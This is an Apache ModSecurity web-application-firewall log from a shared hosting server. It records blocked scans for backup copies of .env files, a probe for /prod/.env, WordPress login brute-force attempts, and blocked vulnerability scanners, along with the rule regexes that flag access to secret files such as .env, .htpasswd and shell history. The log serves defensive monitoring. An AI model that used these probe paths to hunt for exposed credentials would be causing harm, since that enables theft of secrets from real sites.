[Tue May 26 14:47:01.297305 2026] [security2:error] [pid 648203:tid 648298] [remote 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNSwAA414"]
[Tue May 26 14:47:01.299497 2026] [security2:error] [pid 648203:tid 648299] [remote 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNTgAA418"]
[Tue May 26 14:47:01.302305 2026] [security2:error] [pid 648203:tid 648284] [remote 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNRgAA41A"]
[Tue May 26 14:47:01.309961 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNVQAA42U"]
[Tue May 26 14:47:01.310581 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNXwAA4wA"]
[Tue May 26 14:47:01.311844 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNYQAA4wI"]
[Tue May 26 14:47:01.455440 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNkAAA41A"]
[Tue May 26 14:47:01.457155 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNbAAA4wQ"]
[Tue May 26 14:47:01.457741 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNawAA4wU"]
[Tue May 26 14:47:01.472045 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNkgAA42U"]
[Tue May 26 14:47:01.482374 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNagAA4wE"]
[Tue May 26 14:47:01.540257 2026] [security2:error] [pid 648203:tid 648358] [client 208.84.100.109:52106] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production.copy"] [unique_id "ahVlDbEQDDtxJNiDrdTNnAAAAJ4"]
[Tue May 26 14:47:02.016826 2026] [security2:error] [pid 648203:tid 648341] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlDbEQDDtxJNiDrdTNnwAAAI0"]
[Tue May 26 14:47:02.146583 2026] [security2:error] [pid 648203:tid 648407] [client 208.84.100.109:13972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production~"] [unique_id "ahVlDrEQDDtxJNiDrdTNuQAAAM8"]
[Tue May 26 14:47:02.233672 2026] [security2:error] [pid 648203:tid 648425] [client 208.84.100.109:13966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production.backup"] [unique_id "ahVlDrEQDDtxJNiDrdTNuwAAAOE"]
[Tue May 26 14:47:02.233763 2026] [security2:error] [pid 648203:tid 648399] [client 208.84.100.109:13958] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production.old"] [unique_id "ahVlDrEQDDtxJNiDrdTNugAAAMc"]
[Tue May 26 14:47:02.234357 2026] [security2:error] [pid 648203:tid 648370] [client 208.84.100.109:13950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production.bak"] [unique_id "ahVlDrEQDDtxJNiDrdTNvAAAAKo"]
[Tue May 26 14:47:02.245688 2026] [security2:error] [pid 648203:tid 648376] [client 208.84.100.109:14004] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local.old"] [unique_id "ahVlDrEQDDtxJNiDrdTNvQAAALA"]
[Tue May 26 14:47:02.248417 2026] [security2:error] [pid 648203:tid 648408] [client 208.84.100.109:13928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local.swp"] [unique_id "ahVlDrEQDDtxJNiDrdTNwAAAANA"]
[Tue May 26 14:47:02.248971 2026] [security2:error] [pid 648203:tid 648444] [client 208.84.100.109:13846] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahVlDrEQDDtxJNiDrdTNxwAAAPQ"]
[Tue May 26 14:47:02.249184 2026] [security2:error] [pid 648203:tid 648445] [client 208.84.100.109:13866] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.orig"] [unique_id "ahVlDrEQDDtxJNiDrdTNywAAAPU"]
[Tue May 26 14:47:02.249203 2026] [security2:error] [pid 648203:tid 648362] [client 208.84.100.109:13940] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local.copy"] [unique_id "ahVlDrEQDDtxJNiDrdTNvwAAAKI"]
[Tue May 26 14:47:02.249402 2026] [security2:error] [pid 648203:tid 648449] [client 208.84.100.109:13914] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local~"] [unique_id "ahVlDrEQDDtxJNiDrdTNwQAAAPk"]
[Tue May 26 14:47:02.249525 2026] [security2:error] [pid 648203:tid 648365] [client 208.84.100.109:13854] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahVlDrEQDDtxJNiDrdTNxgAAAKU"]
[Tue May 26 14:47:02.250023 2026] [security2:error] [pid 648203:tid 648369] [client 208.84.100.109:13894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local.bak"] [unique_id "ahVlDrEQDDtxJNiDrdTNxAAAAKk"]
[Tue May 26 14:47:02.250353 2026] [security2:error] [pid 648203:tid 648361] [client 208.84.100.109:13882] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.copy"] [unique_id "ahVlDrEQDDtxJNiDrdTNxQAAAKE"]
[Tue May 26 14:47:02.250525 2026] [security2:error] [pid 648203:tid 648459] [client 208.84.100.109:13902] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local.backup"] [unique_id "ahVlDrEQDDtxJNiDrdTNwgAAAQM"]
[Tue May 26 14:47:02.250525 2026] [security2:error] [pid 648203:tid 648410] [client 208.84.100.109:13818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahVlDrEQDDtxJNiDrdTNyAAAANI"]
[Tue May 26 14:47:02.251377 2026] [security2:error] [pid 648203:tid 648427] [client 208.84.100.109:13828] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahVlDrEQDDtxJNiDrdTNygAAAOM"]
[Tue May 26 14:47:02.251448 2026] [security2:error] [pid 648203:tid 648435] [client 208.84.100.109:13812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahVlDrEQDDtxJNiDrdTNzQAAAOs"]
[Tue May 26 14:47:02.252286 2026] [security2:error] [pid 648203:tid 648421] [client 208.84.100.109:13932] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.local.orig"] [unique_id "ahVlDrEQDDtxJNiDrdTNzwAAAN0"]
[Tue May 26 14:47:02.260492 2026] [security2:error] [pid 648203:tid 648434] [client 20.12.190.196:55248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/x402.php"] [unique_id "ahVlDrEQDDtxJNiDrdTN1AAAAOo"]
[Tue May 26 14:47:02.260573 2026] [security2:error] [pid 648203:tid 648434] [client 20.12.190.196:55248] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/x402.php"] [unique_id "ahVlDrEQDDtxJNiDrdTN1AAAAOo"]
[Tue May 26 14:47:02.335013 2026] [security2:error] [pid 648203:tid 648424] [client 208.84.100.109:52106] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production.swp"] [unique_id "ahVlDrEQDDtxJNiDrdTN3gAAAOA"]
[Tue May 26 14:47:02.337179 2026] [security2:error] [pid 648203:tid 648437] [client 208.84.100.109:13986] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env.production.orig"] [unique_id "ahVlDrEQDDtxJNiDrdTN3wAAAO0"]
[Tue May 26 14:47:02.565143 2026] [security2:error] [pid 648203:tid 648357] [client 85.204.70.106:46100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/xmlrpc.php"] [unique_id "ahVlDrEQDDtxJNiDrdTN5gAAAJ0"]
[Tue May 26 14:47:02.565296 2026] [security2:error] [pid 648203:tid 648357] [client 85.204.70.106:46100] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "avprealty.com"] [uri "/xmlrpc.php"] [unique_id "ahVlDrEQDDtxJNiDrdTN5gAAAJ0"]
[Tue May 26 14:47:03.140636 2026] [security2:error] [pid 648203:tid 648355] [client 209.50.170.170:62079] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlDrEQDDtxJNiDrdTNuAAAAJs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:04.023750 2026] [security2:error] [pid 648203:tid 648449] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlD7EQDDtxJNiDrdTOBgAAAPk"]
[Tue May 26 14:47:04.338982 2026] [security2:error] [pid 648203:tid 648398] [client 20.12.190.196:55676] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVlELEQDDtxJNiDrdTOHAAAAMY"]
[Tue May 26 14:47:04.339205 2026] [security2:error] [pid 648203:tid 648398] [client 20.12.190.196:55676] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/themes.php"] [unique_id "ahVlELEQDDtxJNiDrdTOHAAAAMY"]
[Tue May 26 14:47:04.452014 2026] [security2:error] [pid 648203:tid 648451] [client 216.26.237.196:35215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.237.26.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlELEQDDtxJNiDrdTOEwAAAPs"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:04.452199 2026] [security2:error] [pid 648203:tid 648351] [client 114.119.145.150:38001] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVlELEQDDtxJNiDrdTOHgAAAJc"], referer: https://theafterglow-centre.com/events/list/?tribe-bar-date=2024-06-01
[Tue May 26 14:47:06.271454 2026] [security2:error] [pid 648203:tid 648361] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlEbEQDDtxJNiDrdTOPQAAAKE"]
[Tue May 26 14:47:06.563910 2026] [security2:error] [pid 648203:tid 648446] [client 65.111.4.30:11387] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlEbEQDDtxJNiDrdTOMgAAAPY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:08.554974 2026] [security2:error] [pid 648203:tid 648334] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlFLEQDDtxJNiDrdTOZwAAAIY"]
[Tue May 26 14:47:08.663830 2026] [security2:error] [pid 648203:tid 648364] [client 216.26.227.59:9657] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlE7EQDDtxJNiDrdTOXAAAAKQ"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:09.674695 2026] [security2:error] [pid 648203:tid 648345] [client 195.178.110.34:57500] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.consultrgb.com"] [uri "/___proxy_subdomain_cpanel/prod/.env"] [unique_id "ahVlFbEQDDtxJNiDrdTOmgAAAJE"]
[Tue May 26 14:47:10.260085 2026] [security2:error] [pid 648203:tid 648381] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlFbEQDDtxJNiDrdTOpQAAALU"]
[Tue May 26 14:47:10.840023 2026] [security2:error] [pid 648203:tid 648398] [client 209.50.187.129:23313] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlFbEQDDtxJNiDrdTOlwAAAMY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:13.034274 2026] [security2:error] [pid 648203:tid 648367] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlGLEQDDtxJNiDrdTO8AAAAKc"]
[Tue May 26 14:47:13.035123 2026] [security2:error] [pid 648203:tid 648374] [client 104.207.60.174:43137] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlF7EQDDtxJNiDrdTO4wAAAK4"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:13.193781 2026] [security2:error] [pid 648203:tid 648339] [client 172.98.32.50:38483] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVlGLEQDDtxJNiDrdTPAQAAAIs"]
[Tue May 26 14:47:15.163853 2026] [security2:error] [pid 648203:tid 648394] [client 45.3.55.135:54427] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlGrEQDDtxJNiDrdTPJAAAAMI"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:15.371345 2026] [security2:error] [pid 648203:tid 648403] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlGrEQDDtxJNiDrdTPQwAAAMs"]
[Tue May 26 14:47:16.429687 2026] [security2:error] [pid 648203:tid 648452] [client 45.3.44.233:12631] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.44.3.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlHLEQDDtxJNiDrdTPbQAAAPw"], referer: https://velanstore.ca/wp-login.php
